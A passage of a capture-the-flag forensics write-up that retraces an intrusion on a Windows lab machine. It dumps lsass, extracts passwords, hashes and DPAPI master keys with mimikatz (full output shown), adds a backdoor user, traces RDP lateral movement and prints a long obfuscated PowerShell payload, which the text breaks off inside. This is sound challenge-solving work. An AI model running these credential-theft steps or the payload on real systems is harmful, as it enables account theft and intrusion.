`C:\Windows\System32\UpdateAgent.exe -accepteula -ma lsass.exe C:\Windows\System32\errordump` lsass.exe and save the data in `C:\Windows\System32\error.dmp` ![](https://i.imgur.com/Ql2srkz.png) Execute `C:\Windows\System32\mimikatz.exe` ![](https://i.imgur.com/a78FNXr.png) Since the description mentioned that there are two parts of the flag for this topic, we need to obtain the first part of the flag according to the idea ### The first part flag2: First extract `C:\Windows\System32\error.dmp` ![](https://i.imgur.com/xmlVYhz.png) Download a mimikatz https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.7z Admin runs cmd which then runs mimikatz ps: For convenience, I renamed error.dmp to lsass.dmp and put it in the same directory as mimikatz ``` mimikatz # privilege::debug Privilege '20' OK mimikatz # sekurlsa::minidump lsass.dmp Switch to MINIDUMP : 'lsass.dmp' mimikatz # sekurlsa::logonPasswords full Opening : 'lsass.dmp' file for minidump... Authentication Id : 0 ; 284687 (00000000:0004580f) Session : Interactive from 1 User Name : IEUser Domain : IEWIN7 Logon Server : IEWIN7 Logon Time : 2023/1/8 2:47:38 SID : S-1-5-21-1610009768-122519599-941061767-1000 msv : [00010000] CredentialKeys * NTLM : 022156166aa2ab0ce4de16a45098d745 * SHA1 : ece4d499be6e18ebf42225da680e702abf639db3 [00000003] Primary * Username : IEUser * Domain : IEWIN7 * NTLM : 022156166aa2ab0ce4de16a45098d745 * SHA1 : ece4d499be6e18ebf42225da680e702abf639db3 tspkg : wdigest : * Username : IEUser * Domain : IEWIN7 * Password : idek{crEDentia kerberos : * Username : IEUser * Domain : IEWIN7 * Password : (null) ssp : credman : Authentication Id : 0 ; 95278 (00000000:0001742e) Session : Service from 0 User Name : sshd_server Domain : IEWIN7 Logon Server : IEWIN7 Logon Time : 2023/1/8 2:46:44 SID : S-1-5-21-1610009768-122519599-941061767-1002 msv : [00010000] CredentialKeys * NTLM : 8d0a16cfc061c3359db455d00ec27035 * SHA1 : 94bd2df8ae5cadbbb5757c3be01dd40c27f9362f [00000003] Primary * Username : sshd_server * Domain : IEWIN7 * NTLM : 8d0a16cfc061c3359db455d00ec27035 * SHA1 : 94bd2df8ae5cadbbb5757c3be01dd40c27f9362f tspkg : wdigest : * Username : sshd_server * Domain : IEWIN7 * Password : D@rj33l1ng kerberos : * Username : sshd_server * Domain : IEWIN7 * Password : (null) ssp : credman : Authentication Id : 0 ; 997 (00000000:000003e5) Session : Service from 0 User Name : LOCAL SERVICE Domain : NT AUTHORITY Logon Server : (null) Logon Time : 2023/1/8 2:46:43 SID : S-1-5-19 msv : tspkg : wdigest : * Username : (null) * Domain : (null) * Password : (null) kerberos : * Username : (null) * Domain : (null) * Password : (null) ssp : credman : Authentication Id : 0 ; 996 (00000000:000003e4) Session : Service from 0 User Name : IEWIN7$ Domain : WORKGROUP Logon Server : (null) Logon Time : 2023/1/8 2:46:43 SID : S-1-5-20 msv : tspkg : wdigest : * Username : IEWIN7$ * Domain : WORKGROUP * Password : (null) kerberos : * Username : iewin7$ * Domain : WORKGROUP * Password : (null) ssp : credman : Authentication Id : 0 ; 44073 (00000000:0000ac29) Session : UndefinedLogonType from 0 User Name : (null) Domain : (null) Logon Server : (null) Logon Time : 2023/1/8 2:46:43 SID : msv : tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 0 ; 999 (00000000:000003e7) Session : UndefinedLogonType from 0 User Name : IEWIN7$ Domain : WORKGROUP Logon Server : (null) Logon Time : 2023/1/8 2:46:43 SID : S-1-5-18 msv : tspkg : wdigest : * Username : IEWIN7$ * Domain : WORKGROUP * Password : (null) kerberos : * Username : iewin7$ * Domain : WORKGROUP * Password : (null) ssp : credman : ``` In this way, we can get the first part of the flag2 --> `IDEK{credentia` ### The second part flag2: Tips: I personally think that this part is somewhat misleading. When I communicate with admin on the ticket, admin means that the released traffic is not a necessary condition to solve this problem (although it is also written in Note.txt, but I seem to forget ), but it can help to understand. Personally, I think it is somewhat misleading. However, in my mind-set, this part gave a password, which may be used, so I was stuck on this part for a while. After all, I wondered if there might be some traffic authentication, but I found that it was not. Then I found this The article is about the decryption of credential certificate https://www.cnblogs.com/Thorndike/p/15325079.html, I personally suggest that it can be optimized here to ensure that it can be natural Find DB79FF0C49C20D542F3690C933AC3046 under `C:\Users\IEUser\AppData\Local\Microsoft\Credentials` and extract it ![](https://i.imgur.com/NLKkqCy.png) Get the GUID of Credentials ``` mimikatz # dpapi::cred /in:DB79FF0C49C20D542F3690C933AC3046 **BLOB** dwVersion : 00000001 - 1 guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb} dwMasterKeyVersion : 00000001 - 1 guidMasterKey : {9fd81d55-a794-4a77-9fdc-38eff814d2be} dwFlags : 20000000 - 536870912 (system ; ) dwDescriptionLen : 00000030 - 48 szDescription : Local Credential Data ``` guidMasterKey --> `{9fd81d55-a794-4a77-9fdc-38eff814d2be}` Import dmp: ``` mimikatz # sekurlsa::minidump lsass.dmp Switch to MINIDUMP : 'lsass.dmp' ``` Get masterkey: ``` mimikatz # privilege::debug Privilege '20' OK mimikatz # sekurlsa::dpapi Authentication Id : 0 ; 284687 (00000000:0004580f) Session : Interactive from 1 User Name : IEUser Domain : IEWIN7 Logon Server : IEWIN7 Logon Time : 2023/1/8 2:47:38 SID : S-1-5-21-1610009768-122519599-941061767-1000 [00000000] * GUID : {9fd81d55-a794-4a77-9fdc-38eff814d2be} * Time : 2023/1/8 2:47:40 * MasterKey : e7b41c6fc2aa1edc0dc74dee160f024ff4fa026c307794c4f7739771ff60975fc7c311ab3d5346e998d61c1906a8a7b59c7c21d16910e23f4afa3959982ccccb * sha1(key) : de78dc1fb05d27eddaa81f4c2143d43a9a316f1e Authentication Id : 0 ; 95278 (00000000:0001742e) Session : Service from 0 User Name : sshd_server Domain : IEWIN7 Logon Server : IEWIN7 Logon Time : 2023/1/8 2:46:44 SID : S-1-5-21-1610009768-122519599-941061767-1002 Authentication Id : 0 ; 997 (00000000:000003e5) Session : Service from 0 User Name : LOCAL SERVICE Domain : NT AUTHORITY Logon Server : (null) Logon Time : 2023/1/8 2:46:43 SID : S-1-5-19 Authentication Id : 0 ; 996 (00000000:000003e4) Session : Service from 0 User Name : IEWIN7$ Domain : WORKGROUP Logon Server : (null) Logon Time : 2023/1/8 2:46:43 SID : S-1-5-20 Authentication Id : 0 ; 44073 (00000000:0000ac29) Session : UndefinedLogonType from 0 User Name : (null) Domain : (null) Logon Server : (null) Logon Time : 2023/1/8 2:46:43 SID : Authentication Id : 0 ; 999 (00000000:000003e7) Session : UndefinedLogonType from 0 User Name : IEWIN7$ Domain : WORKGROUP Logon Server : (null) Logon Time : 2023/1/8 2:46:43 SID : S-1-5-18 [00000000] * GUID : {79cd7db5-e519-453b-9dc9-ad52372a33d1} * Time : 2023/1/8 2:46:56 * MasterKey : 50f4acc588c6f7aab0902c5e638c46b3671b150abf8d55e5a5ae47c50062607e3ec383b1973bae8d9d53815e59bfe012c594a232f2788562e461c9620ae74c31 * sha1(key) : 913dba47ec0e0122494b963271da1c8a5757ef6c [00000001] * GUID : {f22e410f-f947-4e08-8f2a-8f65df603f8d} * Time : 2023/1/8 2:46:43 * MasterKey : 19c05880b67d50f8231cd8009836e3cdc55610e4877f8b976abd5ca15600d0e759934324c6204b56f02527039e7fc52a1dfb5296d3381aaa7c3eb610dffa32fa * sha1(key) : b859b2b52e7e49cf5c70069745c88853c4b23487 ``` MasterKey --> `e7b41c6fc2aa1edc0dc74dee160f024ff4fa026c307794c4f7739771ff60975fc7c311ab3d5346e998d61c1906a8a7b59c7c21d16910e23f4afa3959982ccccb` decrypt: ``` mimikatz # dpapi::cred /in:DB79FF0C49C20D542F3690C933AC3046 /masterkey:e7b41c6fc2aa1edc0dc74dee160f024ff4fa026c307794c4f7739771ff60975fc7c311ab3d5346e998d61c1906a8a7b59c7c21d16910e23f4afa3959982ccccb **BLOB** dwVersion : 00000001 - 1 guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb} dwMasterKeyVersion : 00000001 - 1 guidMasterKey : {9fd81d55-a794-4a77-9fdc-38eff814d2be} dwFlags : 20000000 - 536870912 (system ; ) dwDescriptionLen : 00000030 - 48 szDescription : Local Credential Data algCrypt : 00006610 - 26128 (CALG_AES_256) dwAlgCryptLen : 00000100 - 256 dwSaltLen : 00000020 - 32 pbSalt : d1ae596e635002339b7dcce09f5ff6acc53b7bc9395d162ea93c328f98c31f53 dwHmacKeyLen : 00000000 - 0 pbHmackKey : algHash : 0000800e - 32782 (CALG_SHA_512) dwAlgHashLen : 00000200 - 512 dwHmac2KeyLen : 00000020 - 32 pbHmack2Key : 92e17a569f3c13606b0893c758fb9e81c1a06d2015dcebcf15107900a963ad0e dwDataLen : 000000f0 - 240 pbData : 1413918e9f648cfb258ed6bd270360ab66d1d5e9c16580866a899184a71feb58219ade909f09184d6796ef0bd91e5091be80e76f48aa4cf7f29bfda7bb63d74e62698283cf2b6faf8ad44ddc296341acd8e61fe8cd12f2e33e8ae6bd20b328772b0816b881f21f877d8a1506fcbb06ce2b85688244b05911e97fa3f9068af0d17de3f6813cc937be00830986e93e2a467de46f11260746fe42ea38f6a20d79f1696de59efe69ead3bcb97a7ce85d45a6c78ec77bfe42b1a891175a519d37286ab3cf8a58955fdc5561f7543e6754953cce0576f58819433a47c930a31c9ad4dccf7376b1be3b00b7111ba649876b20d1 dwSignLen : 00000040 - 64 pbSign : 7f41a9469ad24a5e572c48ab6f0f1919f0a53e52963ad88676fb730aa9d6ba7e4045e5b3e45c9a33b56ca720c82d202cabd8085cabc5f3834e537ff79a987f22 Decrypting Credential: * volatile cache: GUID:{9fd81d55-a794-4a77-9fdc-38eff814d2be};KeyHash:de78dc1fb05d27eddaa81f4c2143d43a9a316f1e;Key:available * masterkey : e7b41c6fc2aa1edc0dc74dee160f024ff4fa026c307794c4f7739771ff60975fc7c311ab3d5346e998d61c1906a8a7b59c7c21d16910e23f4afa3959982ccccb **CREDENTIAL** credFlags : 00000030 - 48 credSize : 000000ea - 234 credUnk0 : 00000000 - 0 Type : 00000002 - 2 - domain_password Flags : 00000000 - 0 LastWritten : 2023/1/6 15:55:10 unkFlagsOrSize : 00000040 - 64 Persist : 00000002 - 2 - local_machine AttributeCount : 00000000 - 0 unk0 : 00000000 - 0 unk1 : 00000000 - 0 TargetName : Domain:target=TERMSRV/192.168.209.134 UnkData : (null) Comment : (null) TargetAlias : (null) UserName : administrator CredentialBlob : l_4C3S5_f0R_1@73rAl_mOv3M3n7} Attributes : 0 ``` Get the second part of the second flag --> `l_4C3S5_f0R_1@73rAl_mOv3M3n7}` Splice the two to get flag2 --> `idek{crEDential_4C3S5_f0R_1@73rAl_mOv3M3n7}` ## HiddenGem Mixtape 3: The Ultimate Goal ### Add user: Run `net user netadmin S3cr3tpa5sw0rD /add` ![](https://i.imgur.com/6FqvhTR.png) However, this does not seem to be used later as a related operation, but this part is more like an RDP prompt. Of course, you can also find RDP through the traffic part ### RDP: In the traffic packet, we can know that when the attacker steals relevant credentials through mimikatz, he logs in to `192.168.209.147` through rdp and then logs in to `192.168.209.134` from `192.168.209.147`. The relevant traffic is as follows: ![](https://i.imgur.com/JUoJXK7.png) ![](https://i.imgur.com/k0ql290.png) There are also some relevant information in the `Security.evtx` log ![](https://i.imgur.com/YQ1rtX3.png) ![](https://i.imgur.com/dI1fUeH.png) ### BMC: Since the existence of RDP is known, at the same time, it can be associated with the RDP cache bitmap. After extracting these files, `C:\Users\IEUser\AppData\Local\Microsoft\Terminal Server Client\Cache\` can use bmc-tools to get the relevant data https://github.com/ANSSI-FR/bmc-tools ![](https://i.imgur.com/JY59ZGq.png) Then do the jigsaw puzzle to get ![](https://i.imgur.com/txXf7vq.png) ![](https://i.imgur.com/lBbRcuq.png) It is not difficult to speculate that it uses the BitsTranser module to download the dns-stealing file and load it https://learn.microsoft.com/en-us/powershell/module/bitstransfer/start-bitstransfer?view=windowsserver2022-ps ``` python3 bmc-tools.py -s Cache0000.bin -d ./00/ python3 bmc-tools.py -s Cache0001.bin -d ./01/ python3 bmc-tools.py -s Cache0002.bin -d ./02/ ``` Next step to analyze the obfuscated powershell script ### Powershell 2nd: https://gist.github.com/bquanman/cb6a4b2420d9f3d2f27287dcb46661d6 After decrypting once, we get ``` ( ')(@'| &('%'){ ${;@!}= + $()} { ${;+} =${;@!}}{ ${~=} = ++${;@!} } {${@[}=( ${;@!} =${;@!} + ${~=})} {${~}= ( ${;@!}=${;@!}+ ${~=} ) }{${![/} = ( ${;@!}=${;@!} +${~=}) } { ${$] }= (${;@!} =${;@!}+${~=} ) } { ${]} =(${;@!} = ${;@!} + ${~=}) }{ ${](}= ( ${;@!}=${;@!}+${~=} )} { ${'$[}= ( ${;@!}=${;@!}+${~=} )}{${@$/}=( ${;@!}= ${;@!}+${~=}) } { ${)} ="[" + "$(@{} )"[ ${](} ] + "$(@{ })"[ "${~=}${@$/}" ]+"$( @{})"[ "${@[}${;+}"] + "$?"[ ${~=}] +"]"}{ ${;@!}="".("$( @{ })"["${~=}${![/}"] + "$( @{})"[ "${~=}${]}" ] + "$(@{ }) "[ ${;+} ] + "$( @{} ) "[${![/}] +"$?"[${~=} ] +"$(@{ })"[${~} ]) }{${;@!}= "$( @{}) "[ "${~=}${![/}" ]+"$(@{}) "[${![/} ]+"${;@!}"[ "${@[}${](}" ] } ) ;"${)}${~}${]}+${)}${~=}${;+}${;+}+${)}${]}${~=} +${)}${~}${![/} +${)}${![/}${@$/} +${)}${$] }${$] }+ ${)}${$] }${;+} +${)}${![/}${]}+${)}${$] }${;+}+ ${)}${![/}${@$/} +${)}${![/}${]}+${)}${$] }${;+} + ${)}${![/}${'$[}+${)}${![/}${]}+${)}${$] }${](}+${)}${$] }${![/} +${)}${~}${![/} +${)}${$] }${@$/} +${)}${~}${@[}+ ${)}${~}${]}+${)}${~=}${~=}${$] } + ${)}${]}${~=}+ ${)}${$] }${@[} + ${)}${$] }${@$/}+ ${)}${~}${@[} + ${)}${~}${]}+${)}${@$/}${'$[} +${)}${]}${~=}+ ${)}${$] }${~} + ${)}${$] }${$] } + ${)}${$] }${@$/} +${)}${~}${@[} +${)}${](}${~=}+ ${)}${~=}${;+}${~=}+ ${)}${~=}${~=}${]} +${)}${![/}${$] } +${)}${]}${](}+ ${)}${~=}${;+}${![/}+${)}${~=}${;+}${$] }+ ${)}${~=}${;+}${'$[} +${)}${~=}${;+}${;+} +${)}${](}${~} + ${)}${~=}${~=}${]}+${)}${~=}${;+}${~=}+${)}${~=}${;+}${@$/}+ ${)}${~}${@[} + ${)}${~}${![/} +${)}${![/}${]} +${)}${~}${![/}+ ${)}${~}${@[}+ ${)}${~=}${@[}${![/}+ ${)}${~}${@[} +${)}${](}${;+}+ ${)}${~=}${~=}${~=}+${)}${~=}${~=}${![/}+${)}${~=}${;+}${~=} +${)}${@$/}${](}+${)}${@$/}${@$/}+${)}${~=}${;+}${![/}+${)}${![/}${$] }+ ${)}${](}${@$/}+${)}${@$/}${'$[} +${)}${~=}${;+}${]}+ ${)}${~=}${;+}${~=} +${)}${@$/}${@$/} + ${)}${~=}${~=}${]}+ ${)}${~}${@[} +${)}${~=}${@[}${~} + ${)}${~}${]} + ${)}${@$/}${](}+${)}${]}${~=}+ ${)}${@$/}${~=} + ${)}${'$[}${~} + ${)}${~=}${@[}${~=}+${)}${~=}${~=}${$] } + ${)}${~=}${~=}${]}+${)}${~=}${;+}${~=}+ ${)}${~=}${;+}${@$/} + ${)}${![/}${]}+${)}${]}${](}+ ${)}${~=}${~=}${~=}+ ${)}${~=}${~=}${;+}+ ${)}${~=}${~=}${'$[}+ ${)}${~=}${;+}${~=}+ ${)}${~=}${~=}${![/}+${)}${~=}${~=}${]} +${)}${@$/}${~} +${)}${$] }${'$[}+ ${)}${$] }${'$[}+ ${)}${'$[}${![/}+${)}${~=}${~=}${~=}+ ${)}${]}${]}+${)}${@$/}${](} +${)}${~=}${~=}${$] }+ ${)}${~=}${;+}${~=}+${)}${$] }${![/} + ${)}${$] }${@[}+${)}${'$[}${~} +${)}${~=}${~=}${]} + ${)}${~=}${~=}${![/}+ ${)}${~=}${;+}${$] }+${)}${~=}${~=}${;+}+ ${)}${~=}${;+}${~}+ ${)}${![/}${;+}+ ${)}${~}${]}+${)}${]}${@$/} +${)}${~=}${~=}${;+}+ ${)}${@$/}${@$/} + ${)}${![/}${]}+${)}${](}${~=} +${)}${~=}${;+}${~=} + ${)}${~=}${~=}${]} + ${)}${]}${]}+ ${)}${~=}${@[}${~=}+${)}${~=}${~=}${]}+${)}${~=}${;+}${~=} +${)}${~=}${~=}${$] }+${)}${![/}${;+} +${)}${~}${]} + ${)}${@$/}${$] } + ${)}${![/}${]}+ ${)}${](}${'$[}+ ${)}${@$/}${](} +${)}${~=}${;+}${@$/} +${)}${~=}${;+}${~=}+${)}${![/}${~=}+ ${)}${![/}${~=} +${)}${$] }${@$/}+ ${)}${~}${@[} +${)}${~}${]}+${)}${'$[}${@[}+${)}${]}${~=} + ${)}${~=}${@[}${~}+${)}${~}${]} +${)}${]}${'$[} + ${)}${![/}${![/} +${)}${~}${]} + ${)}${](}${$] } +${)}${]}${~=} +${)}${~}${]}+${)}${]}${$] }+${)}${~=}${~=}${![/} + ${)}${~=}${;+}${~} +${)}${~=}${~=}${$] }+${)}${$] }${@$/} +${)}${~}${]}+ ${)}${'$[}${~}+${)}${]}${~=}+ ${)}${![/}${'$[}+${)}${![/}${]}+ ${)}${![/}${]} + ${)}${$] }${;+} + ${)}${$] }${~} +${)}${$] }${~} +${)}${$] }${@$/} + ${)}${![/}${'$[} +${)}${![/}${]}+${)}${![/}${]} + ${)}${$] }${;+}+ ${)}${$] }${~}+ ${)}${$] }${~} +${)}${~=}${@[}${![/} +${)}${~}${](}+${)}${~=}${@[}${~} +${)}${~}${]} + ${)}${](}${![/} +${)}${]}${~=} +${)}${![/}${;+}+${)}${~}${]}+${)}${](}${![/}+${)}${![/}${~} + ${)}${~}${]} + ${)}${'$[}${~}+ ${)}${@$/}${~=}+ ${)}${~}${]}+${)}${@$/}${$] }+${)}${@$/}${~}+ ${)}${![/}${~} + ${)}${~}${]} + ${)}${](}${$] } +${)}${@$/}${~=} +${)}${~}${]} +${)}${@$/}${$] }+ ${)}${~}${](} +${)}${~}${]} + ${)}${](}${$] } + ${)}${![/}${]}+${)}${](}${]} +${)}${~=}${;+}${~=}+${)}${~=}${~=}${;+} + ${)}${~=}${;+}${~}+ ${)}${~=}${~=}${]} +${)}${~=}${;+}${![/} +${)}${@$/}${~}+${)}${![/}${~=}+ ${)}${~}${](}+${)}${$] }${;+}+${)}${$] }${~}+${)}${$] }${![/} + ${)}${$] }${@$/} + ${)}${~}${]}+${)}${'$[}${~}+ ${)}${@$/}${~=}+ ${)}${~}${]} + ${)}${@$/}${$] } +${)}${@$/}${~} + ${)}${![/}${![/} + ${)}${~}${]} +${)}${'$[}${~}+${)}${@$/}${~=} +${)}${~}${]}+ ${)}${](}${![/}+ ${)}${@$/}${~} +${)}${]}${~=}+${)}${~}${]}+ ${)}${'$[}${~}+${)}${@$/}${~=}+${)}${~}${]} + ${)}${](}${![/} +${)}${@$/}${~}+ ${)}${![/}${![/} + ${)}${~}${]} + ${)}${'$[}${~} +${)}${@$/}${~=} +${)}${~}${]} +${)}${@$/}${$] } + ${)}${@$/}${~} +${)}${~=}${@[}${$] }+${)}${$] }${@$/} + ${)}${~}${]}+ ${)}${]}${'$[}+ ${)}${~=}${@[}${![/}+${)}${~}${](} + ${)}${~=}${@[}${~} +${)}${~}${]} +${)}${](}${~}+${)}${]}${~=} +${)}${![/}${;+}+ ${)}${~}${]}+ ${)}${](}${~} + ${)}${![/}${~}+ ${)}${![/}${@$/}+ ${)}${![/}${~=} + ${)}${~}${](} +${)}${$] }${;+} +${)}${$] }${~}+${)}${$] }${![/}+ ${)}${$] }${@$/}+ ${)}${~}${]}+ ${)}${](}${@[} +${)}${]}${~=}+${)}${![/}${;+}+ ${)}${~}${]} +${)}${](}${@[}+ ${)}${![/}${~} +${)}${~}${]}+${)}${'$[}${~}+ ${)}${@$/}${~=} + ${)}${~}${]}+${)}${](}${~}+${)}${@$/}${~}+${)}${![/}${~=} + ${)}${~}${](} +${)}${$] }${;+}+ ${)}${$] }${~} + ${)}${$] }${![/} +${)}${$] }${@$/}+${)}${~}${]} +${)}${'$[}${~}+${)}${@$/}${~=}+ ${)}${~}${]} +${)}${](}${~}+${)}${@$/}${~}+${)}${![/}${![/}+ ${)}${~}${]}+ ${)}${'$[}${~}+ ${)}${@$/}${~=}+ ${)}${~}${]}+ ${)}${](}${@[} +${)}${@$/}${~} + ${)}${]}${~=} +${)}${~}${]}+${)}${'$[}${~}+ ${)}${@$/}${~=} + ${)}${~}${]}+${)}${](}${@[}+${)}${@$/}${~}+ ${)}${![/}${![/} + ${)}${~}${]}+ ${)}${'$[}${~} +${)}${@$/}${~=}+ ${)}${~}${]} + ${)}${](}${~}+${)}${@$/}${~} + ${)}${$] }${@$/} + ${)}${~}${]} + ${)}${@$/}${$] } +${)}${![/}${$] }+ ${)}${@$/}${'$[}+${)}${~=}${@[}${;+}+ ${)}${~=}${~=}${~=} + ${)}${~=}${~=}${![/}+ ${)}${~}${]}+ ${)}${'$[}${~}+${)}${@$/}${~=}+ ${)}${![/}${;+}+ ${)}${~}${]}+${)}${'$[}${~}+${)}${@$/}${~=}+ ${)}${~}${]}+ ${)}${](}${~} +${)}${@$/}${~} +${)}${![/}${~} + ${)}${~}${]}+ ${)}${'$[}${~} +${)}${@$/}${~=}+${)}${~}${]} +${)}${](}${@[}+${)}${@$/}${~} + ${)}${![/}${~=}+ ${)}${~}${](} + ${)}${$] }${;+}+ ${)}${$] }${~} + ${)}${$] }${![/} +${)}${@$/}${~}+ ${)}${~=}${@[}${$] }+ ${)}${~=}${@[}${$] }+ ${)}${$] }${@$/}+ ${)}${~}${@[} +${)}${~}${]} + ${)}${]}${@$/} +${)}${~=}${~=}${;+} + ${)}${@$/}${@$/}+ ${)}${~}${@[} + ${)}${]}${~=} +${)}${~}${@[} + ${)}${@$/}${~=}+${)}${'$[}${~} +${)}${~=}${@[}${~=} + ${)}${~=}${~=}${$] }+ ${)}${~=}${~=}${]} + ${)}${~=}${;+}${~=} +${)}${~=}${;+}${@$/}+ ${)}${![/}${]}+${)}${'$[}${![/}+${)}${~=}${;+}${~=}+${)}${~=}${@[}${;+} + ${)}${~=}${~=}${]} +${)}${![/}${]} + ${)}${]}${@$/} + ${)}${~=}${~=}${;+} + ${)}${@$/}${@$/}+${)}${~=}${~=}${~=} +${)}${~=}${;+}${;+} + ${)}${~=}${;+}${$] }+ ${)}${~=}${~=}${;+} +${)}${~=}${;+}${~}+ ${)}${@$/}${~}+${)}${$] }${'$[}+${)}${$] }${'$[}+ ${)}${]}${$] } + ${)}${'$[}${~}+ ${)}${]}${](}+${)}${](}${~}+ ${)}${](}${~} + ${)}${$] }${@$/} +${)}${~}${@[}+${)}${~}${]} +${)}${~=}${~=}${@[}+${)}${~}${@[}+ ${)}${]}${~=} +${)}${~}${@[}+ ${)}${~}${]}+ ${)}${]}${@$/}+ ${)}${~=}${~=}${;+}+ ${)}${@$/}${@$/}+ ${)}${![/}${]} +${)}${](}${~=} +${)}${~=}${;+}${~=} +${)}${~=}${~=}${]} +${)}${]}${]}+ ${)}${~=}${@[}${~=}+${)}${~=}${~=}${]}+${)}${~=}${;+}${~=} + ${)}${~=}${~=}${$] }+${)}${![/}${;+} +${)}${~}${@$/}+${)}${@$/}${~=}+ ${)}${'$[}${~} + ${)}${~=}${@[}${~=} +${)}${~=}${~=}${$] } + ${)}${~=}${~=}${]} + ${)}${~=}${;+}${~=} +${)}${~=}${;+}${@$/}+ ${)}${![/}${]} + ${)}${](}${~}+${)}${](}${@$/}+ ${)}${![/}${]}+ ${)}${](}${;+}+${)}${~=}${;+}${$] }+ ${)}${~=}${;+}${'$[}+ ${)}${~=}${;+}${~=} +${)}${@$/}${~} + ${)}${$] }${'$[}+ ${)}${$] }${'$[}+ ${)}${'$[}${@[}+ ${)}${~=}${;+}${~=} + ${)}${@$/}${](} +${)}${~=}${;+}${;+}+ ${)}${]}${$] }+ ${)}${~=}${;+}${'$[} + ${)}${~=}${;+}${'$[}+${)}${]}${]} +${)}${~=}${@[}${~=}+${)}${~=}${~=}${]} + ${)}${~=}${;+}${~=} + ${)}${~=}${~=}${$] } + ${)}${![/}${;+} + ${)}${~}${]} +${)}${@$/}${$] }+${)}${![/}${]} +${)}${](}${;+}+${)}${~=}${~=}${](}+${)}${~=}${;+}${'$[}+${)}${~=}${;+}${'$[}+${)}${](}${'$[} + ${)}${@$/}${](} + ${)}${~=}${;+}${@$/} + ${)}${~=}${;+}${~=}+ ${)}${![/}${~=} +${)}${~}${@$/} + ${)}${![/}${~=} + ${)}${$] }${@$/}+${)}${~}${@[} + ${)}${~}${]} +${)}${~=}${@[}${@[} +${)}${~}${@[}+ ${)}${]}${~=} +${)}${~}${@[} + ${)}${~}${]}+ ${)}${]}${@$/}+ ${)}${~=}${~=}${;+}+ ${)}${@$/}${@$/} +${)}${![/}${]} +${)}${](}${~=} +${)}${~=}${;+}${~=} + ${)}${~=}${~=}${]} +${)}${]}${]} + ${)}${~=}${@[}${~=} +${)}${~=}${~=}${]}+ ${)}${~=}${;+}${~=} +${)}${~=}${~=}${$] } +${)}${![/}${;+}+${)}${@$/}${~=}+ ${)}${'$[}${~} + ${)}${~=}${@[}${~=}+ ${)}${~=}${~=}${$] }+ ${)}${~=}${~=}${]} +${)}${~=}${;+}${~=}+${)}${~=}${;+}${@$/}+ ${)}${![/}${]} + ${)}${](}${~}+${)}${](}${@$/}+ ${)}${![/}${]} +${)}${](}${;+} +${)}${~=}${;+}${$] } + ${)}${~=}${;+}${'$[}+${)}${~=}${;+}${~=} + ${)}${@$/}${~}+ ${)}${$] }${'$[}+${)}${$] }${'$[} +${)}${'$[}${@[} + ${)}${~=}${;+}${~=} +${)}${@$/}${](}+ ${)}${~=}${;+}${;+} +${)}${]}${$] } +${)}${~=}${;+}${'$[} + ${)}${~=}${;+}${'$[} +${)}${]}${]}+${)}${~=}${@[}${~=}+ ${)}${~=}${~=}${]} +${)}${~=}${;+}${~=} +${)}${~=}${~=}${$] }+ ${)}${![/}${;+}+${)}${~}${]} + ${)}${@$/}${$] } + ${)}${![/}${]} + ${)}${](}${;+} +${)}${~=}${~=}${](} +${)}${~=}${;+}${'$[}+ ${)}${~=}${;+}${'$[} + ${)}${](}${'$[}+${)}${@$/}${](}+${)}${~=}${;+}${@$/} + ${)}${~=}${;+}${~=} +${)}${![/}${~=}+${)}${![/}${~=} + ${)}${$] }${@$/} +${)}${~}${@[} +${)}${~}${]} +${)}${~=}${~=}${](} +${)}${~}${@[}+${)}${]}${~=} +${)}${~}${@[} + ${)}${![/}${;+}+ ${)}${~}${'$[} + ${)}${~}${@[}+${)}${~}${]}+${)}${'$[}${@[}+${)}${~}${@[} +${)}${~}${]} +${)}${~=}${@[}${@[} +${)}${~}${@[}+ ${)}${~}${]}+${)}${~=}${~=}${@[} + ${)}${![/}${~=}+ ${)}${$] }${@$/}+${)}${~}${@[}+ ${)}${~}${]}+${)}${~=}${;+}${~=} + ${)}${~}${@[} +${)}${]}${~=}+${)}${~}${@[}+${)}${@$/}${~=}+ ${)}${'$[}${~} +${)}${~=}${@[}${~=} + ${)}${~=}${~=}${$] }+${)}${~=}${~=}${]}+ ${)}${~=}${;+}${~=}+${)}${~=}${;+}${@$/} +${)}${![/}${]} +${)}${]}${](} +${)}${~=}${~=}${~=} +${)}${~=}${~=}${;+}+${)}${~=}${~=}${'$[} + ${)}${~=}${;+}${~=}+${)}${~=}${~=}${![/} + ${)}${~=}${~=}${]} + ${)}${@$/}${~}+${)}${$] }${'$[} +${)}${$] }${'$[}+ ${)}${'$[}${![/} + ${)}${~=}${~=}${~=}+ ${)}${]}${]}+${)}${@$/}${](} + ${)}${~=}${~=}${$] } +${)}${~=}${;+}${~=} +${)}${$] }${![/}+${)}${$] }${@[} +${)}${'$[}${~}+ ${)}${~=}${~=}${]} +${)}${~=}${~=}${![/} +${)}${~=}${;+}${$] } +${)}${~=}${~=}${;+} + ${)}${~=}${;+}${~}+ ${)}${![/}${;+} + ${)}${~}${]}+${)}${~=}${~=}${](} + ${)}${![/}${~=} +${)}${$] }${@$/} + ${)}${~}${@[} + ${)}${~}${]}+ ${)}${~=}${;+}${'$[} + ${)}${]}${~=}+ ${)}${~}${]}+ ${)}${~=}${;+}${~=}+ ${)}${![/}${]}+ ${)}${](}${]} +${)}${~=}${;+}${~=}+${)}${~=}${~=}${;+}+${)}${~=}${;+}${~}+ ${)}${~=}${~=}${]}+${)}${~=}${;+}${![/} + ${)}${$] }${@$/} + ${)}${~}${@[}+${)}${~}${]}+ ${)}${~=}${~=}${![/} +${)}${]}${~=}+ ${)}${~}${![/} +${)}${~}${![/} +${)}${$] }${@$/} + ${)}${~}${@[} +${)}${~}${]}+ ${)}${~=}${~=}${;+}+${)}${]}${~=}+ ${)}${![/}${'$[} + ${)}${$] }${@$/} + ${)}${~}${@[} + ${)}${~=}${~=}${@$/}+${)}${~=}${;+}${![/}+${)}${~=}${;+}${$] }+ ${)}${~=}${;+}${'$[} + ${)}${~=}${;+}${~=}+${)}${~}${@[} +${)}${![/}${;+} + ${)}${~}${]}+${)}${~=}${~=}${;+}+ ${)}${~}${@[} + ${)}${![/}${$] }+${)}${~=}${;+}${'$[} +${)}${~=}${;+}${~=} + ${)}${~}${@[}+${)}${![/}${;+}+ ${)}${~}${]} + ${)}${~=}${;+}${'$[}+${)}${![/}${](} +${)}${~}${]} + ${)}${@$/}${'$[}+${)}${![/}${~=} + 